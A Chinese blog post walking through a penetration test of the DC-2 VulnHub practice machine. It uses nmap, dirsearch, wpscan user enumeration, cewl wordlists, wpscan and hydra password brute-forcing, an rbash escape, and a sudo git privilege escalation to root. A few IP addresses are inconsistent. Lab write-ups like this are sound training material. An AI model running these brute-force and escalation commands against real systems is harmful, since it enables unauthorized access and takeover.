DC-2靶机渗透测试

于 2023-12-19 20:29:32 发布
阅读量410 收藏 7
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liumx0105/article/details/135091961
版权

先对目标靶机的网段进行扫描,用nmap命令

nmap -sS 192.168.182.0/24

在这里插入图片描述
发现目标IP为10.9.63.96(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有80、7744端口开放,打开网页输入ip查看一下80端口http服务网页
打开http://192.168.182.145发现网页打不开,于是我觉得会有隐藏端口,于是再用nmap工具进行扫描一遍

sudo nmap -sS -sV -T4 -O -A 192.168.182.145

在这里插入图片描述
这里需要进行更改本地DNS文件否则访问不了,我们修改一下/etc/hosts文件

vim /etc/hosts
192.168.182.145 dc-2

在这里插入图片描述
再次打开网页192.168.182.135
在这里插入图片描述
发现了第一个flag
在这里插入图片描述
flag提醒我们需要找寻找密码和用户,用dirsearch工具扫描一下此网站的目录。

dirsearch -u http://192.168.182.145/ -x 403 404 405 500

在这里插入图片描述
发现了admin页面,判断是一个登录后台的页面
在这里插入图片描述
用wpscan枚举一下用户信息

wpscan --url http://dc-2 -e u

在这里插入图片描述
发现了三个相关的用户名admin,jerry,tom,创建一下用户名字典
用cewl命令获得密码字典

cewl http://dc-2 -w passwd_dc2.txt

在这里插入图片描述
根据生成的用户名和密码进行爆破

wpscan --url http://dc-2/ -U user_dc2.txt -P passwd_dc2.txt

在这里插入图片描述
获得用户jerry,密码为adipiscing;用户tom,密码为parturient

登录网站后台
在这里插入图片描述
发现第二个flag
在这里插入图片描述
尝试一下ssh登录,看一下哪个账户能登录进去

hydra -L user_dc2.txt -P passwd_dc2.txt 192.168.182.145 ssh -s 7744

在这里插入图片描述
发现用户tom能进行ssh连接,尝试ssh连接

ssh -p 7744 tom@192.168.182.145

在这里插入图片描述
登录tom成功,发现flag3,但是同时发现很多指令不能使用,发现有rbash限制
在这里插入图片描述
查看路径搜索变量PATH

echo $PATH

在这里插入图片描述
查看还有哪些命令能用

ls /home/tom/usr/bin

在这里插入图片描述
发现vi可以用,我们看一下flag3.txt
在这里插入图片描述
接下来我们就需要使用一些方法逃逸出rbash,我们输入以下两条命令来逃逸出这个受限制的shell

# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a
/bin/bash

# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

在这里插入图片描述
发现已经绕过入了,flag3提示我们su,我们尝试切换到jerry用户

su jerry

在这里插入图片描述
成功登录jerry,发现flag4,提示我们用git提权,我们用sudo -l查看一下可以用的root权限命令

sudo -l

在这里插入图片描述
确定是用git进行提权,用下面的命令进行提权

sudo git -p help config
!/bin/sh

在这里插入图片描述
发现已经提权成功,查看id已经是root权限,ls发现第四个flag
在这里插入图片描述
进入根目录,发现第五个flag
在这里插入图片描述
至此DC-2靶机也被我们打穿啦

刘怼怼灬
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8404
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
全球与中国贴片电阻市场现状及未来发展趋势(2024版).docx
08-21
全球与中国贴片电阻市场现状及未来发展趋势(2024版).docx
【浏览器插件】自选基金助手 实时查看基金涨跌幅.zip
08-21
【浏览器插件-自选基金助手】一款开源插件,让您实时掌握自选基金的估值动态,轻松管理自选基金列表,数据随账号同步。新增微信小程序"韭菜计算助手",提供更多便利。主要功能包括: - 实时估值提醒 - 特别关注单个基金 - 自定义角标内容,涵盖基金收益额与收益率 - 支持明暗两种主题 - 基金信息导入导出 - 智能识别节假日,自动切换休市状态 - 设置持仓份额或金额,查看当日估值收益 - 设置持仓成本价,计算持有收益 - 手动加仓减仓 - 账号登录,实现跨平台数据同步 - 实际净值更新提示 - 查看估值走势图、净值、收益等 - 查看基金持仓明细、基本信息及基金经理信息 - 自定义顶部指数内容 - 基金列表展示内容自定义 - 拖拽排序功能 - 基金排序功能 - 模糊搜索添加基金,支持批量操作 - 行情中心展示资金流向、板块动态等 更新日志: - v3.1.2 修复QDII基金异常问题 - v3.1.0 调整估值数据源,解决基金列表空白问题 - v3.0.6 修复基金列表及夜间净值更新问题 - v3.0.5 解决估值调整异常 - v3.0.4 修复部分设备基金数据问题 - v3.0.3 优化加
毕业设计,基于SpringBoot+Vue+MySQL开发的论坛系统,源码+数据库+开题报告+论文答辩+毕业论文+视频演示
08-21
毕业设计,基于SpringBoot+Vue+MySQL开发的论坛系统,源码+数据库+开题报告+论文答辩+毕业论文+视频演示 如今的时代,是有史以来最好的时代,随着计算机的发展到现在的移动终端的发展,国内目前信息技术已经在世界上遥遥领先,让人们感觉到处于信息大爆炸的社会。信息时代的信息处理肯定不能用之前的手工处理这样的解决方法,必须采用计算机来处理这些信息,因为传统方法对应计算机处理的信息效率上真的相差甚远。 本次使用Java技术开发的论坛系统,就是运用计算机来管理论坛帖子信息,该系统是可以实现版主管理,新闻信息管理,论坛帖子管理,用户管理,留言版管理等功能。 论坛系统使用计算机处理相关信息,主要是在数据的传输上能达到即可传递,数据不管是想要获取或者输入,都可以及时反馈,极大的提高了效率,使用的MySQL数据库也能让数据更能安全的存储。 关键词:论坛系统;版主;帖子;SpringBoot
谷歌GPT的安装的软件
08-21
谷歌GPT是由谷歌团队开发的一种基于Transformer架构的深度学习模型。它的名称源自于其是一种基于预训练的生成式模型。预训练的方法允许该模型处理海量数据的输入,以便更好地预测和生成输出。Transformers是一种适用于序列数据的架构,它可以有效地处理自然语言处理等领域的任务,如机器翻译、文本摘要等。 谷歌GPT首次被引入深度学习领域是在2018年,当时的任务是完成一些单一的自然语言处理任务。该模型在18个自然语言处理任务中表现出了惊人的准确性,超过了使用传统方法的多个前沿算法。在这个基础上,谷歌团队又发展出了更加先进、更加全面的GPT-2模型,它能够生成更高质量的文本,并且在多种领域的任务中表现出了出色的性能。
java资源网页表格组件GWTAdvancedTable
08-21
java资源网页表格组件 GWT Advanced Table提取方式是百度网盘分享地址
java资源人工智能工具包OpenAIjava资源人工智能工具包OpenAI
08-21
java资源人工智能工具包 OpenAIjava资源人工智能工具包 OpenAI提取方式是百度网盘分享地址
公开+GJBZ142-2004 军用软件安全性分析指南.pdf
08-21
公开+GJBZ142-2004 军用软件安全性分析指南
毕业设计,基于SpringBoot+Vue+MySQL开发的博客系统,源码+数据库+毕业论文+视频演示
08-21
毕业设计,基于SpringBoot+Vue+MySQL开发的精简博客系统,源码+数据库+毕业论文+视频演示 当下,正处于信息化的时代,许多行业顺应时代的变化,结合使用计算机技术向数字化、信息化建设迈进。以前企业对于博客信息的管理和控制,采用人工登记的方式保存相关数据,这种以人力为主的管理模式已然落后。本人结合使用主流的程序开发技术,设计了一款基于Springboot开发的精简博客系统,可以较大地减少人力、财力的损耗,方便相关人员及时更新和保存信息。本系统主要使用B/S开发模式,在idea开发平台上,运用Java语言设计相关的系统功能模块,MySQL数据库管理相关的系统数据信息,SpringBoot框架设计和开发系统功能架构,最后通过使用Tomcat服务器,在浏览器中发布设计的系统,并且完成系统与数据库的交互工作。本文对系统的需求分析、可行性分析、技术支持、功能设计、数据库设计、功能测试等内容做了较为详细的介绍,并且在本文中也展示了系统主要的功能模块设计界面和操作界面,并对其做出了必要的解释说明,方便用户对系统进行操作和使用,以及后期的相关人员对系统进行更新和维护。本系统的实现可以极大地提高企业的工作效率,提升用户的使用体验,因此在现实生活中运用本系统具有很大的使用价值。 关键词:博客管理;Java语言;B/S结构;MySQL数据库
Git-2.46.0-32-bit.exe
08-21
官网下载的Git-2.46.0-32-bit.exe标准安装版本
华为od机考算法题题库,机考算法题,含答案和解题思路,学习算法和刷题可以用
08-21
内容概要:华为od机考算法题题库,刷题用 适用人群:大厂机考面试者,学生 应用场景:机考算法题,含答案和解题思路
[毕业设计]JAVA 邮件收发与通知系统(Javamail技术)(源代码+论文).zip
最新发布
08-21
[毕业设计]JAVA 邮件收发与通知系统(Javamail技术)(源代码+论文)
“人力资源+大数据+薪酬报告+涨薪调薪”
08-21
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
基于STM32G474的四开关Buck-Boost数字电源,支持TypeC接口PD诱骗输入和DC5.5接口输入
08-21
一款基于STM32G474的四开关Buck-Boost数字电源,支持TypeC接口PD诱骗输入和DC5.5接口输入,输入/输出最高48V10A,这是我的毕业设计,现在开源出来,含原理图、PCB、程序源码、外壳3D模型等资料。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值